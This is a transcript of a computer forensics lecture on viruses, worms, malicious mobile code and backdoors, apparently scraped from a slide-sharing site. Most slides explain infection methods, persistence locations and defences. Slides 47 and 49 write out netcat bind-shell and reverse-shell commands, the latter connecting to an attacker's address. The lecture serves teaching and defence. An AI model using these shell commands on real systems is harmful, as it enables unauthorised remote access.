1 / 139

Viruses, Worms, Mobile Code

Viruses, Worms, Mobile Code. COEN 252: Computer Forensics. Viruses: The Principle. Virus attaches itself to a host that can execute instructions contained in the virus. When the host is invoked, the virus copies itself to other locations on the system. Executables.

wei
Download Presentation

Viruses, Worms, Mobile Code

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Viruses, Worms, Mobile Code COEN 252: Computer Forensics

  2. Viruses: The Principle • Virus attaches itself to a host that can execute instructions contained in the virus. • When the host is invoked, the virus copies itself to other locations on the system.

  3. Executables • Companion Infection Technique • OS will call the virus when the user requests the companion file. • Windows: • Virus is Notepad.com to hide as Notepad.exe. • Set the hidden attribute to prevent the virus from being seen. • Launch the true notebook.exe file from the virus. • If the user selects Start  Run and types in notebook, then windows starts the virus (notebook.com instead of notebook.exe)

  4. Executables • Companion Infection Technique • Windows: • Virus renames Notepad.exe to Notepad.ex_ and hides it. • Virus takes the place of Notepad.exe. • Works with shortcuts. • Used in the Trilisa virus / worm (2002)

  5. Executables • Companion Infection Technique • Virus uses alternate data stream feature of NTFS: • Streams look like one file in explorer and directory listings. • System activates the default stream, the virus. • Virus calls alternate stream. • Win2KStream Virus (2000)

  6. Executables • Overwriting Techniques • Virus replaces part of an executable. • Usually the executable looses functionality. • Users will now that there is something wrong. • Prepending Techniques • Virus placed in front of executable. • After virus executes, host program is called. • Very easy for .com files. • Easy to clean files. • Bliss virus had a disinfect mode built into it. • Used by the NIMDA worm.

  7. Executables • Appending Infection Technique • Insert itself at the end of host file. • Add a jump at the beginning of host file. • Stealth Techniques for Prepending and Appending: • Compress host. • When virus calls hosts, host is uncompressed into RAM. • Fill up total package (virus, compressed host) to same size as original host. • Change filler so that checksum is not changed.

  8. Boot Sector Modification • Target Master Boot Record or Partition Boot Sector. • Michelangelo Virus (1991). • Replaced MBR boot strap to elsewhere on disk. • First the virus loads itself into memory, then it passes control to the original MBR boot sector. • Places itself into all boot sector of all floppies. • Memory-resident copy of the virus is attached to low-level BIOS drivers. • Gets called when these are executed. • Can no longer spread under WinNT, Win2K, WinXP, only wreak havoc, e.g. by overwriting the sectors right after the partition boot sector.

  9. Infection of Document Files • Many software use Macros: • MS Office, WordPerfect Office, StarOffice, OpenOffice, AutoCAD, Excel, … • WinOffice runs code in subroutines • Document_Open() • Document_Close() • AutoExec() • …. • Virus can copy itself to the victim’s Normal.dot file. • Normal.dot file is processed whenever WinOffice starts.

  10. Other Targets • Source Code • Scripts • Visual Basic Scripts (.vbs) used by OS: • Startup.vbs • Exec.vbs • Shell scripts, Perl scripts • Java Class Files • Platform independent viruses

  11. Propagation Techniques • Removable Storage • Boot sector viruses, executable viruses • Yamaha’s CD-R drive firmware update contained the Chernobyl virus. • Email attachments • Shared directories

  12. Anti-Virus Defense • Antivirus software on gateways: • User workstations • File servers • Mail servers • Application servers • Border firewalls • Handhelds.

  13. Anti-Virus Defense • Virus signatures • Looks for small patterns indicative of a known virus. • Polymorphic viruses • Heuristics • Looks for programs with bad behavior: • Attempts to access the boot sector • Attempts to locate all files in a directory • Attempts to write to an exe file • Attempts to delete hard drive contents • …

  14. Anti-Virus Defense • Integrity Verification • Generate database of hashes of important files. • Recalculate these hashes and compare them to known values. • Configuration Hardening • Least privilege • Minimize active components. • Set warnings (e.g. against macros) • User education

  15. Anti-Anti-Virus Defense • Stealthing • Hide virus files. • Intercept scanning of infected files. • Slow rate of infection. • … • Polymorphism and Metamorphism • Change order of instructions in virus code • Use equivalent code (increment = subtracting with -1) • Encryption of most of the virus body. • Slightly change functionality of virus as it spreads.

  16. Anti-Anti-Virus Defense • Antivirus software deactivation • Kill processes known to be antivirus processes. • Disable internet access to antivirus vendor’s pages. • Change security settings (e.g. allow Word macros to run)

  17. Worms Worms: • Propagates across a network • Typically, does not require user action for propagation. Virus: • Infects files. • Typically requires user interaction.

  18. Worms Worm Components • Warhead • Propagation Engine • Target Selection Algorithm • Scanning Engine • Payload

  19. Worm Warhead • A piece of code that exploits a vulnerability on the target system • Exploits such as Buffer Overflow Exploits • File Sharing Attacks • E-mail • Common Misconfigurations

  20. Worm Propagation Engine • After gaining access, the worm must transfer itself to the target machine. • Some worms are completely contained in the warhead. • File Transfer Mechanisms • FTP • TFTP • HTTP • SMB (MS Server Message Block) • Windows file sharing • Unix servers running SAMBA

  21. Worm Target Selection Algorithm • Once the worm has gained control of a target, it starts looking for new targets. • E-mail addresses • Host lists • Trusted Systems • Network Neighborhood • DNS queries • Randomly selected ip address.

  22. Worm Scanning Engine • Once targets are identified, the worm scans for the original vulnerability.

  23. Worm Payload • Some specific action done on behalf of the attacker. • Opening up a backdoor. • Planting a distributed denial of service attack. • Performing complex calculations: • password cracking • math research (actually happened)

  24. Worm Spread • Worm spread is limited • Diversity of machines • Tiny worm • targeted only machines running security software from a medium company • was successful in infecting most machines. • Worms can contain support for multiple entry methods. • Too many victims crash • Fast worms can cause network congestion

  25. Worm Trends • Multiplatform worms • Multiexploit worms • Zero-day exploit worms • No chance to patch • Fast-spreading worms: Warhol / Flash • pre-scan targets • Polymorphic worms • Change appearance • Metamorphic worms • Change functionality

  26. Worm Defenses • Ethical (?) Worms • Antivirus tools • Fast patching services • Firewalling • Block arbitrarily outbound connections • Prevents spreading • Establishment of Incident Response Capabilities

  27. Malicious Mobile Code

  28. Backdoors Backdoor: A program that allows attackers to bypass normal security controls on a system, gaining access to which they are not entitled.

  29. Backdoor Types • Local Escalation of Privilege • Remote execution of individual commands. • Remote command-line access. • Remote control of the GUI.

  30. Backdoor Installation • Attacker has compromised the system • Virus, worm, or malicious mobile code installs the backdoor. • Social engineering: Tricking the victim into installing the backdoor. • ...

  31. Starting backdoors automatically Attacker wants to maintain access to the system. • Backdoor needs to restart whenever the system restarts. • Methods are OS dependent.

  32. Starting backdoors automatically on Windows • Altering Startup Files and Folders • Registry • Task Scheduler

  33. Starting backdoors automatically on Windows • Startup folders and files • Autostart folders for individual users and all users.

  34. Starting backdoors automatically on Windows Use: • win.ini • system.ini • Modify “shell=explorer.exe” on Win9x • wininit • winstart.bat (Win9x) • Autoexec.bat (Win9x) • Config.sys (Win9x)

  35. Starting backdoors automatically on Windows • Registry keys start programs on login or reboot: • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ • RunServicesOnce • RunServices • RunOnce • Run • RunOnceEx

  36. Starting backdoors automatically on Windows • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ • RunServicesOnce • RunServices • RunOnce • Run • RunOnceEx

  37. Starting backdoors automatically on Windows • Registry keys start programs on login or reboot: • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad • HKLM\SOFTWARE\Policies\Microsoft\Windows\System\ • Scripts • Explorer\Run

  38. Starting backdoors automatically on Windows • Registry keys start programs on login or reboot: • HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad • HKCU\SOFTWARE\Policies\Microsoft\Windows\System\ • Scripts • Explorer\Run

  39. Starting backdoors automatically on Windows • Registry keys start programs on login or reboot: • HKCR\Exefiles\Shell\Open\Command • Indicates programs that will be run every time another .exe is run.

  40. Starting backdoors automatically on Windows • Use the task scheduler • Check scheduled tasks with autoruns from Sysinternals

  41. Starting backdoors automatically on Unix • Modifying the init daemon • Modifying system and service initialization scripts • Modify the internet daemon script • Change user startup scripts • Schedule jobs with Cron

  42. Starting backdoors automatically on Unix • Modify the init daemon • init daemon is the first process to start. • uses /etc/inittab to find other processes that need to be started • attacker merely adds line to inittab.

  43. Starting backdoors automatically on Unix • Modify system and service initialization scripts • About 20+ system scripts • Located in /etc/rc.d or /etc/init.d • Or merely plant a backdoor in an initialization script for another service. • E.g. ppp daemon • for PPP modem dial-up connections • inetd • network daemon • change /etc/inetd.conf

  44. Starting backdoors automatically on Unix • Adjust user startup scripts • .login • .cshrc • /etc/profile • .logout • .xinitrc • .xsession

  45. Starting backdoors automatically on Unix • Schedule jobs with Cron

  46. Backdoor Defenses • System integrity tools like tripwire

  47. Backdoor with netcat • netcat compiles into executable nc. • On the victim: • nc –l –p 2000 –e cmd.exe (Windows) • nc –l –p 2000 –e /bin/sh (Unix) • Sets up a listener on port 2000. • On the attacker: • nc [victim address] 2222 • gives command shell.

  48. Backdoor with netcat • Only works if attacker can establish a TCP connection to the port on the victim. • Firewalls can block this.

  49. Backdoor with netcat • Use an open door in the firewall: • Shoveling a shell • On the attacker’s machine: • nc –l –p 80 • netcat listener on port 80 • On the victim’s machine: • nc [attacker’s address] 80 –e cmd.exe • initializes outgoing connection to attacker • then executes a shell

  50. Alternatives to netcat cryptcat Tini Q Bindshell Md5bd UDP_Shell TCPshell Crontab-backdoor Backdoor with netcat

More Related